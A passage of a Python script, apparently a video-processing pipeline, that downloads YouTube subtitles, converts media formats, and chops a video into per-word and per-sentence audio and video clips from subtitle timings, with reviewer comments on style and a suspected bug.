#module_convert_audio_to_wav.dir_conversion_to_wav(FORMAT_FROM='.m4a', DIRECTORY='data/')
# converts a single file (OPTIONAL)
module_convert_audio_to_wav.file_conversion_to_wav(FORMAT_FROM='.m4a', FILE_NAME=INPUT_FILE_NAME, BIT_RATE='192k')
whole_pure_audio_file_name_dir = INPUT_FILE_NAME + '.wav'
#8
# Convert mp4 to mkv format as this eliminates errors in the segmentation of the videos later on
video_converted_to_mkv = module_video_processing.convert_from_mp4_to_mkv(FILE_NAME=INPUT_FILE_NAME, INPUT_EXTENSION='.mp4', OUTPUT_EXTENSION = '.mkv')
#9 OPTIONAL
# remove the audio from the mp4 file https://unix.stackexchange.com/questions/6402/how-to-remove-an-audio-track-from-an-mp4-video-file
# for a single file
module_video_processing.remove_audio_from_file_mp4(FILE_NAME=INPUT_FILE_NAME, EXTENSION = '.mp4')
#10 OPTIONAL
# Convert mp4 to mkv format as this eliminates errors in the segmentation of the videos later on, for the no-audio video
video_converted_to_mkv_none_audio = module_video_processing.convert_from_mp4_to_mkv(FILE_NAME=INPUT_FILE_NAME+'_none_audio', INPUT_EXTENSION='.mp4', OUTPUT_EXTENSION = '.mkv')
#3
# Checks what subtitles are available and in what format (e.g. whether timings are given for every word)
string_subtitle_formats, manual_subtitles_exist, automatic_subtitles_exist = module_youtube_extract.list_available_subtitles(URL = INPUT_URL, FILE_NAME = INPUT_FILE_NAME, TXT_CLEAN=False, TXT=False, JSON=False)
#4
# downloads the subtitles
man_sub_var, auto_sub_var = module_youtube_extract.down_sub(URL = INPUT_URL, FILE_NAME=INPUT_FILE_NAME+'SUBTITLES', TYPE='vtt', LANGUAGE='en', MAN_SUB = manual_subtitles_exist, AUTO_SUB = automatic_subtitles_exist, SAVE=True)
#5
# Identify what type of subtitles they are, i.e. whether they contain timings per word or per sentence
man_sub_easy_type, auto_sub_easy_type = module_youtube_extract.sub_type(MAN_SUB = man_sub_var, AUTO_SUB = auto_sub_var, MAN_SUB_EXIST = manual_subtitles_exist, AUTO_SUB_EXIST = automatic_subtitles_exist)
#6
# process the subtitles into easy-to-read lists: one holding the subtitle content and one holding the timings at which it is presented in the video. Note: if timings are allocated per word (as with YouTube's auto-generated subtitles), alignment of subtitles to text is skipped because it has already been done. This function handles all 3 input cases (no subtitles, subtitles aligned per sentence, subtitles aligned per word) for both auto and manual subtitles.
'''
acpwe #auto_content_per_word_easy
atpwe #auto_time_per_word_easy
mcpwe #man_content_per_word_easy
mtpwe #man_time_per_word_easy
acpse #auto_content_per_sentence_easy
atpse #auto_time_per_sentence_easy
acpsh #auto_content_per_sentence_hard
atpsh #auto_time_per_sentence_hard
mcpse #man_content_per_sentence_easy
mtpse #man_time_per_sentence_easy
mcpsh #man_content_per_sentence_hard
mtpsh #man_time_per_sentence_hard
'''
# takes input values from #5 #4 #3
acpwe, atpwe, acpse, atpse, acpsh, atpsh, mcpwe, mtpwe, mcpse, mtpse, mcpsh, mtpsh = module_process_subtitles.format_sub(MAN_SUB_EXIST = manual_subtitles_exist, AUTO_SUB_EXIST = automatic_subtitles_exist, MAN_SUB_EASY_TYPE = man_sub_easy_type, AUTO_SUB_EASY_TYPE = auto_sub_easy_type, MAN_SUB = man_sub_var, AUTO_SUB = auto_sub_var)
video_converted_to_mkv_none_audio_no_extension = video_converted_to_mkv_none_audio.replace('.mkv','')
# NOTE(review): list() turns the path string into a list of single
# characters, which looks suspicious — confirm how downstream code
# consumes this variable before changing it.
video_converted_to_mkv_none_audio_no_extension = list(video_converted_to_mkv_none_audio_no_extension)
##EDIT_ME##
# adjust the following variables
# Controls the chopping properties applied to acpwe, atpwe, acpse, atpse, acpsh, atpsh, mcpwe, mtpwe, mcpse, mtpse, mcpsh, mtpsh for all chopped samples.
# These values are fed into module_video_processing.chop_video_per_word_or_sentence
# shift of each chunk, in milliseconds (positive = right, negative = left)
shift_right_or_left_acpwe = 0
shift_right_or_left_mcpwe = 0
shift_right_or_left_acpse = 0
shift_right_or_left_acpsh = 0
shift_right_or_left_mcpse = 0
shift_right_or_left_mcpsh = 0
# extend each chunk to the left, in milliseconds (negative values)
extend_left_acpwe = -150
extend_left_mcpwe = -150
extend_left_acpse = -150
extend_left_acpsh = -150
extend_left_mcpse = -150
extend_left_mcpsh = -150
# extend each chunk to the right, in milliseconds
extend_right_acpwe = 150
extend_right_mcpwe = 150
extend_right_acpse = 150
extend_right_acpsh = 150
extend_right_mcpse = 150
extend_right_mcpsh = 150
# start word or sentence index into acpwe, atpwe, acpse, atpse, acpsh, atpsh, mcpwe, mtpwe, mcpse, mtpse, mcpsh, mtpsh
start_index_acpwe = 0
start_index_mcpwe = 0
start_index_acpse = 0
start_index_acpsh = 0
start_index_mcpse = 0
start_index_mcpsh = 0
# stop word or sentence index into acpwe, atpwe, acpse, atpse, acpsh, atpsh, mcpwe, mtpwe, mcpse, mtpse, mcpsh, mtpsh
stop_index_acpwe = 5 # set to 'END' to process the whole video
stop_index_mcpwe = 5
stop_index_acpse = 5
stop_index_acpsh = 5
stop_index_mcpse = 5
stop_index_mcpsh = 5
#12
# Fixed and necessary step: get the maximum time (duration) of the video.
# The "easy" per-sentence timings are tried first; when they yield
# nothing, fall back to the "hard" per-sentence timings.
max_time = module_video_processing.maximum_time_of_vid(ATPSE=atpse, MTPSE=mtpse, AUTO=automatic_subtitles_exist, MAN=manual_subtitles_exist)
if max_time is None:  # PEP 8 fix: identity comparison with None
    max_time = module_video_processing.maximum_time_of_vid(ATPSE=atpsh, MTPSE=mtpsh, AUTO=automatic_subtitles_exist, MAN=manual_subtitles_exist)
# Automatic per-word subtitles (acpwe/atpwe): chop one clip per word.
# PEP 8 fix: membership test replaces the `== None` comparisons while
# keeping the exact same semantics (None or empty list on either side).
if acpwe in (None, []) or atpwe in (None, []):
    word_chunk_samples_info_acpwe = None
    chopped_sample_per_word_folder_dir_acpwe = None
    chopped_sample_per_word_folder_dir_pure_audio_acpwe = None
    chopped_sample_per_word_folder_dir_pure_video_acpwe = None
else:
    #7 OPTIONAL
    # Remove or replace special characters (content only — never feed in the time values).
    acpwe = module_process_subtitles.remove_or_replace_special_char(INPUT_SUB_LIST = acpwe, CHAR_TO_REPLACE = 'all', CHAR_TO_REPLACE_WITH = '')
    #9
    # save the subtitles in an easy-to-read format
    module_save_variables.save_sub(VAR_INPUT=acpwe, FILE_NAME=INPUT_FILE_NAME+'_acpwe', TXT=False, JSON=True, TXT_SEPARATOR = '\n')
    #11
    # create a folder to store all chopped samples
    chopped_sample_per_word_folder_dir_acpwe = module_sample_name.folder_gen(RANDOM_STRING = FOLDER_PATH + '/chopped_samples_per_word_acpwe', FILE_PERMISION = '777')
    #13
    # split the video into one chunk per word and save them in the chopped-samples folder
    word_chunk_samples_info_acpwe = module_video_processing.chop_video_per_word_or_sentence(LIST_PER_WORD = acpwe, TIMES_PER_WORD = atpwe, MAX_TIME = max_time, FILE_NAME = INPUT_FILE_NAME, CHOPPED_SAMPLE_FOLDER_DIR = chopped_sample_per_word_folder_dir_acpwe, SAVE_FILE_NAME = chopped_sample_per_word_folder_dir_acpwe + '/word_chunk_samples_info_acpwe.csv', SHIFT_RIGHT_OR_LEFT = shift_right_or_left_acpwe, EXTEND_LEFT = extend_left_acpwe, EXTEND_RIGHT = extend_right_acpwe, EXTENSION = '.mkv', START_INDEX = start_index_acpwe, STOP_INDEX = stop_index_acpwe, SAVE = True)
    #15
    # create folders for the pure-audio and the audio-less video segments
    chopped_sample_per_word_folder_dir_pure_audio_acpwe = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_word_folder_dir_acpwe + '/pure_audio', FILE_PERMISION = '777')
    chopped_sample_per_word_folder_dir_pure_video_acpwe = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_word_folder_dir_acpwe + '/pure_video', FILE_PERMISION = '777')
    #chopped_sample_per_word_folder_dir_combined_acpwe = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_word_folder_dir_acpwe + '/combined', FILE_PERMISION = '777')
# Manual per-word subtitles (mcpwe/mtpwe): chop one clip per word.
# PEP 8 fix: membership test replaces the `== None` comparisons while
# keeping the exact same semantics (None or empty list on either side).
if mcpwe in (None, []) or mtpwe in (None, []):
    word_chunk_samples_info_mcpwe = None
    chopped_sample_per_word_folder_dir_mcpwe = None
    chopped_sample_per_word_folder_dir_pure_audio_mcpwe = None
    chopped_sample_per_word_folder_dir_pure_video_mcpwe = None
else:
    #7 OPTIONAL
    # Remove or replace special characters (content only — never feed in the time values).
    mcpwe = module_process_subtitles.remove_or_replace_special_char(INPUT_SUB_LIST = mcpwe, CHAR_TO_REPLACE = 'all', CHAR_TO_REPLACE_WITH = '')
    #9
    # save the subtitles in an easy-to-read format
    module_save_variables.save_sub(VAR_INPUT=mcpwe, FILE_NAME=INPUT_FILE_NAME+'_mcpwe', TXT=False, JSON=True, TXT_SEPARATOR = '\n')
    #11
    # create a folder to store all chopped samples
    chopped_sample_per_word_folder_dir_mcpwe = module_sample_name.folder_gen(RANDOM_STRING = FOLDER_PATH + '/chopped_samples_per_word_mcpwe', FILE_PERMISION = '777')
    #13
    # split the video into one chunk per word and save them in the chopped-samples folder
    word_chunk_samples_info_mcpwe = module_video_processing.chop_video_per_word_or_sentence(LIST_PER_WORD = mcpwe, TIMES_PER_WORD = mtpwe, MAX_TIME = max_time, FILE_NAME = INPUT_FILE_NAME, CHOPPED_SAMPLE_FOLDER_DIR = chopped_sample_per_word_folder_dir_mcpwe, SAVE_FILE_NAME = chopped_sample_per_word_folder_dir_mcpwe + '/word_chunk_samples_info_mcpwe.csv', SHIFT_RIGHT_OR_LEFT = shift_right_or_left_mcpwe, EXTEND_LEFT = extend_left_mcpwe, EXTEND_RIGHT = extend_right_mcpwe, EXTENSION = '.mkv', START_INDEX = start_index_mcpwe, STOP_INDEX = stop_index_mcpwe, SAVE = True)
    #15
    # create folders for the pure-audio and the audio-less video segments
    chopped_sample_per_word_folder_dir_pure_audio_mcpwe = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_word_folder_dir_mcpwe + '/pure_audio', FILE_PERMISION = '777')
    chopped_sample_per_word_folder_dir_pure_video_mcpwe = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_word_folder_dir_mcpwe + '/pure_video', FILE_PERMISION = '777')
    #chopped_sample_per_word_folder_dir_combined_mcpwe = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_word_folder_dir_mcpwe + '/combined', FILE_PERMISION = '777')
# Automatic per-sentence "easy" subtitles (acpse/atpse): one clip per sentence.
# PEP 8 fix: membership test replaces the `== None` comparisons while
# keeping the exact same semantics (None or empty list on either side).
if acpse in (None, []) or atpse in (None, []):
    sentence_chunk_samples_info_acpse = None
    chopped_sample_per_sentence_folder_dir_acpse = None
    chopped_sample_per_sentence_folder_dir_pure_audio_acpse = None
    chopped_sample_per_sentence_folder_dir_pure_video_acpse = None
else:
    #7 OPTIONAL
    # Remove or replace special characters (content only — never feed in the time values).
    acpse = module_process_subtitles.remove_or_replace_special_char(INPUT_SUB_LIST = acpse, CHAR_TO_REPLACE = 'all', CHAR_TO_REPLACE_WITH = '')
    #9
    # save the subtitles in an easy-to-read format
    module_save_variables.save_sub(VAR_INPUT=acpse, FILE_NAME=INPUT_FILE_NAME+'_acpse', TXT=False, JSON=True, TXT_SEPARATOR = '\n')
    #11
    # create a folder to store all chopped samples
    chopped_sample_per_sentence_folder_dir_acpse = module_sample_name.folder_gen(RANDOM_STRING = FOLDER_PATH + '/chopped_samples_per_sentence_acpse', FILE_PERMISION = '777')
    #13
    # split the video into one chunk per sentence and save them in the chopped-samples folder
    sentence_chunk_samples_info_acpse = module_video_processing.chop_video_per_word_or_sentence(LIST_PER_WORD = acpse, TIMES_PER_WORD = atpse, MAX_TIME = max_time, FILE_NAME = INPUT_FILE_NAME, CHOPPED_SAMPLE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_acpse, SAVE_FILE_NAME = chopped_sample_per_sentence_folder_dir_acpse + '/sentence_chunk_samples_info_acpse.csv', SHIFT_RIGHT_OR_LEFT = shift_right_or_left_acpse, EXTEND_LEFT = extend_left_acpse, EXTEND_RIGHT = extend_right_acpse, EXTENSION = '.mkv', START_INDEX = start_index_acpse, STOP_INDEX = stop_index_acpse, SAVE = True)
    #15
    # create folders for the pure-audio and the audio-less video segments
    chopped_sample_per_sentence_folder_dir_pure_audio_acpse = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_acpse + '/pure_audio', FILE_PERMISION = '777')
    chopped_sample_per_sentence_folder_dir_pure_video_acpse = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_acpse + '/pure_video', FILE_PERMISION = '777')
    #chopped_sample_per_word_folder_dir_combined_acpse = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_acpse + '/combined', FILE_PERMISION = '777')
# Automatic per-sentence "hard" subtitles (acpsh/atpsh): one clip per sentence.
# PEP 8 fix: membership test replaces the `== None` comparisons while
# keeping the exact same semantics (None or empty list on either side).
if acpsh in (None, []) or atpsh in (None, []):
    sentence_chunk_samples_info_acpsh = None
    chopped_sample_per_sentence_folder_dir_acpsh = None
    chopped_sample_per_sentence_folder_dir_pure_audio_acpsh = None
    chopped_sample_per_sentence_folder_dir_pure_video_acpsh = None
else:
    #7 OPTIONAL
    # Remove or replace special characters (content only — never feed in the time values).
    acpsh = module_process_subtitles.remove_or_replace_special_char(INPUT_SUB_LIST = acpsh, CHAR_TO_REPLACE = 'all', CHAR_TO_REPLACE_WITH = '')
    #9
    # save the subtitles in an easy-to-read format
    module_save_variables.save_sub(VAR_INPUT=acpsh, FILE_NAME=INPUT_FILE_NAME+'_acpsh', TXT=False, JSON=True, TXT_SEPARATOR = '\n')
    #11
    # create a folder to store all chopped samples
    chopped_sample_per_sentence_folder_dir_acpsh = module_sample_name.folder_gen(RANDOM_STRING = FOLDER_PATH + '/chopped_samples_per_sentence_acpsh', FILE_PERMISION = '777')
    #13
    # split the video into one chunk per sentence and save them in the chopped-samples folder
    sentence_chunk_samples_info_acpsh = module_video_processing.chop_video_per_word_or_sentence(LIST_PER_WORD = acpsh, TIMES_PER_WORD = atpsh, MAX_TIME = max_time, FILE_NAME = INPUT_FILE_NAME, CHOPPED_SAMPLE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_acpsh, SAVE_FILE_NAME = chopped_sample_per_sentence_folder_dir_acpsh + '/sentence_chunk_samples_info_acpsh.csv', SHIFT_RIGHT_OR_LEFT = shift_right_or_left_acpsh, EXTEND_LEFT = extend_left_acpsh, EXTEND_RIGHT = extend_right_acpsh, EXTENSION = '.mkv', START_INDEX = start_index_acpsh, STOP_INDEX = stop_index_acpsh, SAVE = True)
    #15
    # create folders for the pure-audio and the audio-less video segments
    chopped_sample_per_sentence_folder_dir_pure_audio_acpsh = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_acpsh + '/pure_audio', FILE_PERMISION = '777')
    chopped_sample_per_sentence_folder_dir_pure_video_acpsh = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_acpsh + '/pure_video', FILE_PERMISION = '777')
    #chopped_sample_per_word_folder_dir_combined_acpsh = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_acpsh + '/combined', FILE_PERMISION = '777')
# --- mcpse: manually-created sentence-level chunks (extended timing) ---
# Skip the whole stage when either the subtitle list (mcpse) or its time list
# (mtpse) is missing/empty.  `is None` is the correct identity test (PEP 8);
# the explicit `== []` check is kept so behavior for other falsy values is
# unchanged.
if mcpse is None or mcpse == [] or mtpse is None or mtpse == []:
    # Publish the same variables as the success path so later code can rely
    # on them existing (they are checked/consumed downstream).
    sentence_chunk_samples_info_mcpse = None
    chopped_sample_per_sentence_folder_dir_mcpse = None
    chopped_sample_per_sentence_folder_dir_pure_audio_mcpse = None
    chopped_sample_per_sentence_folder_dir_pure_video_mcpse = None
else:
    #7 OPTIONAL
    # Remove or replace special characters.  Care must be taken not to feed in
    # the time values (only the subtitle text list is passed here).
    mcpse = module_process_subtitles.remove_or_replace_special_char(INPUT_SUB_LIST = mcpse, CHAR_TO_REPLACE = 'all', CHAR_TO_REPLACE_WITH = '')
    #9
    # Save the cleaned subtitles in an easy-to-read JSON file next to the input.
    module_save_variables.save_sub(VAR_INPUT=mcpse, FILE_NAME=INPUT_FILE_NAME+'_mcpse', TXT=False, JSON=True, TXT_SEPARATOR = '\n')
    #11
    # Create a folder to store all chopped per-sentence samples.
    chopped_sample_per_sentence_folder_dir_mcpse = module_sample_name.folder_gen(RANDOM_STRING = FOLDER_PATH + '/chopped_samples_per_sentence_mcpse', FILE_PERMISION = '777')
    #13
    # Split the video into one chunk per sentence (using mcpse text + mtpse
    # times) and save the chunks plus a CSV manifest in the folder above.
    sentence_chunk_samples_info_mcpse = module_video_processing.chop_video_per_word_or_sentence(LIST_PER_WORD = mcpse, TIMES_PER_WORD = mtpse, MAX_TIME = max_time, FILE_NAME = INPUT_FILE_NAME, CHOPPED_SAMPLE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_mcpse, SAVE_FILE_NAME = chopped_sample_per_sentence_folder_dir_mcpse + '/sentence_chunk_samples_info_mcpse.csv', SHIFT_RIGHT_OR_LEFT = shift_right_or_left_mcpse, EXTEND_LEFT = extend_left_mcpse, EXTEND_RIGHT = extend_right_mcpse, EXTENSION = '.mkv', START_INDEX = start_index_mcpse, STOP_INDEX = stop_index_mcpse, SAVE = True)
    #15
    # Create sub-folders for the audio-only and video-only versions of each chunk.
    chopped_sample_per_sentence_folder_dir_pure_audio_mcpse = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_mcpse + '/pure_audio', FILE_PERMISION = '777')
    chopped_sample_per_sentence_folder_dir_pure_video_mcpse = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_mcpse + '/pure_video', FILE_PERMISION = '777')
    #chopped_sample_per_word_folder_dir_combined_mcpse = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_mcpse + '/combined', FILE_PERMISION = '777')
# --- mcpsh: manually-created sentence-level chunks (shifted timing) ---
# Skip the whole stage when either the subtitle list (mcpsh) or its time list
# (mtpsh) is missing/empty.  `is None` is the correct identity test (PEP 8);
# the explicit `== []` check is kept so behavior for other falsy values is
# unchanged.
if mcpsh is None or mcpsh == [] or mtpsh is None or mtpsh == []:
    # Publish the same variables as the success path so later code can rely
    # on them existing (they are checked/consumed downstream).
    sentence_chunk_samples_info_mcpsh = None
    chopped_sample_per_sentence_folder_dir_mcpsh = None
    chopped_sample_per_sentence_folder_dir_pure_audio_mcpsh = None
    chopped_sample_per_sentence_folder_dir_pure_video_mcpsh = None
else:
    #7 OPTIONAL
    # Remove or replace special characters.  Care must be taken not to feed in
    # the time values (only the subtitle text list is passed here).
    mcpsh = module_process_subtitles.remove_or_replace_special_char(INPUT_SUB_LIST = mcpsh, CHAR_TO_REPLACE = 'all', CHAR_TO_REPLACE_WITH = '')
    #9
    # Save the cleaned subtitles in an easy-to-read JSON file next to the input.
    module_save_variables.save_sub(VAR_INPUT=mcpsh, FILE_NAME=INPUT_FILE_NAME+'_mcpsh', TXT=False, JSON=True, TXT_SEPARATOR = '\n')
    #11
    # Create a folder to store all chopped per-sentence samples.
    chopped_sample_per_sentence_folder_dir_mcpsh = module_sample_name.folder_gen(RANDOM_STRING = FOLDER_PATH + '/chopped_samples_per_sentence_mcpsh', FILE_PERMISION = '777')
    #13
    # Split the video into one chunk per sentence (using mcpsh text + mtpsh
    # times) and save the chunks plus a CSV manifest in the folder above.
    sentence_chunk_samples_info_mcpsh = module_video_processing.chop_video_per_word_or_sentence(LIST_PER_WORD = mcpsh, TIMES_PER_WORD = mtpsh, MAX_TIME = max_time, FILE_NAME = INPUT_FILE_NAME, CHOPPED_SAMPLE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_mcpsh, SAVE_FILE_NAME = chopped_sample_per_sentence_folder_dir_mcpsh + '/sentence_chunk_samples_info_mcpsh.csv', SHIFT_RIGHT_OR_LEFT = shift_right_or_left_mcpsh, EXTEND_LEFT = extend_left_mcpsh, EXTEND_RIGHT = extend_right_mcpsh, EXTENSION = '.mkv', START_INDEX = start_index_mcpsh, STOP_INDEX = stop_index_mcpsh, SAVE = True)
    #15
    # Create sub-folders for the audio-only and video-only versions of each chunk.
    chopped_sample_per_sentence_folder_dir_pure_audio_mcpsh = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_mcpsh + '/pure_audio', FILE_PERMISION = '777')
    chopped_sample_per_sentence_folder_dir_pure_video_mcpsh = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_mcpsh + '/pure_video', FILE_PERMISION = '777')
    #chopped_sample_per_word_folder_dir_combined_mcpsh = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_mcpsh + '/combined', FILE_PERMISION = '777')
#16
# Build plain lists holding only the file names of each chopped sample, for
# every chunk family (acpwe/mcpwe words, acpsh/acpse/mcpsh/mcpse sentences).
# NOTE(review): some *_info variables above may be None when the matching
# subtitle list was empty — presumably the generate_list_* helpers tolerate
# None input; confirm in module_video_processing.
# Input .mkv chunk file names, per word:
LLIST_INPUT_WORD_CHUNK_SAMPLES_ACPWE_FILE_NAMES = module_video_processing.generate_list_input_word_chunk_samples_file_names(WORD_CHUNK_SAMPLES_FILE_NAMES = word_chunk_samples_info_acpwe)
LLIST_INPUT_WORD_CHUNK_SAMPLES_MCPWE_FILE_NAMES = module_video_processing.generate_list_input_word_chunk_samples_file_names(WORD_CHUNK_SAMPLES_FILE_NAMES = word_chunk_samples_info_mcpwe)
# Input .mkv chunk file names, per sentence:
LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSH_FILE_NAMES = module_video_processing.generate_list_input_sentence_chunk_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_mcpsh)
LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSE_FILE_NAMES = module_video_processing.generate_list_input_sentence_chunk_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_mcpse)
LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSH_FILE_NAMES = module_video_processing.generate_list_input_sentence_chunk_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_acpsh)
LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSE_FILE_NAMES = module_video_processing.generate_list_input_sentence_chunk_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_acpse)
# Output .wav (audio-only) file names, per word, rooted at the pure_audio folders:
LIST_OUTPUT_AUDIO_WORD_CHOPPED_ACPWE_NAMES = module_video_processing.generate_list_output_audio_word_chopped_samples_file_names(WORD_CHUNK_SAMPLES_FILE_NAMES = word_chunk_samples_info_acpwe, CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR = chopped_sample_per_word_folder_dir_acpwe, CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR_PURE_AUDIO = chopped_sample_per_word_folder_dir_pure_audio_acpwe, AUDIO_EXTENSION = '.wav')
LIST_OUTPUT_AUDIO_WORD_CHOPPED_MCPWE_NAMES = module_video_processing.generate_list_output_audio_word_chopped_samples_file_names(WORD_CHUNK_SAMPLES_FILE_NAMES = word_chunk_samples_info_mcpwe, CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR = chopped_sample_per_word_folder_dir_mcpwe, CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR_PURE_AUDIO = chopped_sample_per_word_folder_dir_pure_audio_mcpwe, AUDIO_EXTENSION = '.wav')
# Output .mkv (video-only) file names, per word, rooted at the pure_video folders:
LIST_OUTPUT_VIDEO_WORD_CHOPPED_ACPWE_NAMES = module_video_processing.generate_list_output_video_word_chopped_samples_file_names(WORD_CHUNK_SAMPLES_FILE_NAMES = word_chunk_samples_info_acpwe , CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR = chopped_sample_per_word_folder_dir_acpwe, CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR_PURE_VIDEO = chopped_sample_per_word_folder_dir_pure_video_acpwe, VIDEO_EXTENSION = '.mkv')
LIST_OUTPUT_VIDEO_WORD_CHOPPED_MCPWE_NAMES = module_video_processing.generate_list_output_video_word_chopped_samples_file_names(WORD_CHUNK_SAMPLES_FILE_NAMES = word_chunk_samples_info_mcpwe , CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR = chopped_sample_per_word_folder_dir_mcpwe, CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR_PURE_VIDEO = chopped_sample_per_word_folder_dir_pure_video_mcpwe, VIDEO_EXTENSION = '.mkv')
# Output .wav (audio-only) file names, per sentence:
LIST_OUTPUT_AUDIO_SENTENCE_MCPSH_CHOPPED_NAMES = module_video_processing.generate_list_output_audio_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_mcpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_mcpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_AUDIO = chopped_sample_per_sentence_folder_dir_pure_audio_mcpsh, AUDIO_EXTENSION = '.wav')
LIST_OUTPUT_AUDIO_SENTENCE_MCPSE_CHOPPED_NAMES = module_video_processing.generate_list_output_audio_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_mcpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_mcpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_AUDIO = chopped_sample_per_sentence_folder_dir_pure_audio_mcpse, AUDIO_EXTENSION = '.wav')
LIST_OUTPUT_AUDIO_SENTENCE_ACPSH_CHOPPED_NAMES = module_video_processing.generate_list_output_audio_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_acpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_acpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_AUDIO = chopped_sample_per_sentence_folder_dir_pure_audio_acpsh, AUDIO_EXTENSION = '.wav')
LIST_OUTPUT_AUDIO_SENTENCE_ACPSE_CHOPPED_NAMES = module_video_processing.generate_list_output_audio_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_acpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_acpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_AUDIO = chopped_sample_per_sentence_folder_dir_pure_audio_acpse, AUDIO_EXTENSION = '.wav')
# Output .mkv (video-only) file names, per sentence:
LIST_OUTPUT_VIDEO_SENTENCE_MCPSH_CHOPPED_NAMES = module_video_processing.generate_list_output_video_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_mcpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_mcpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_VIDEO = chopped_sample_per_sentence_folder_dir_pure_video_mcpsh, VIDEO_EXTENSION = '.mkv')
LIST_OUTPUT_VIDEO_SENTENCE_ACPSE_CHOPPED_NAMES = module_video_processing.generate_list_output_video_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_acpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_acpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_VIDEO = chopped_sample_per_sentence_folder_dir_pure_video_acpse, VIDEO_EXTENSION = '.mkv')
LIST_OUTPUT_VIDEO_SENTENCE_ACPSH_CHOPPED_NAMES = module_video_processing.generate_list_output_video_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_acpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_acpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_VIDEO = chopped_sample_per_sentence_folder_dir_pure_video_acpsh, VIDEO_EXTENSION = '.mkv')
LIST_OUTPUT_VIDEO_SENTENCE_MCPSE_CHOPPED_NAMES = module_video_processing.generate_list_output_video_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_mcpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_mcpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_VIDEO = chopped_sample_per_sentence_folder_dir_pure_video_mcpse, VIDEO_EXTENSION = '.mkv')
#17
# Extract the audio from the chopped .mkv samples into .wav files under the
# pure_audio folders (step #17), then write audio-stripped copies of the same
# samples under the pure_video folders (step #18).
# Single-file variant, kept for reference:
# module_video_processing.extract_audio_from_single_mkv_files(INPUT_FILE_NAME, OUTPUT_FILE_NAME, BIT_RATE = '192000')
# Multiple files, per word:
